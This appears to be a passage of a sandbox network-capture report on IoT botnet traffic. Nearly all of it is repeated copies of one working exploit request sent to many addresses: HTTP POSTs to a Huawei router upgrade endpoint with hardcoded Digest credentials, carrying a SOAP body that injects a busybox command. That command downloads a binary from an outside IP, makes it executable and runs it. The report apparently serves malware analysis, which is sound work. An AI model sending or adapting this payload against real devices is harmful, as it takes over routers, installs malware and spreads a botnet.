                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:15.241713047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:23.945537090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:42.376631021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:17.191227913 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      115192.168.2.1443810156.123.89.9237215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.734143019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658031940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746021986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:10.889988899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      116192.168.2.1446492102.200.236.13837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:06.735380888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:07.658020020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746021032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
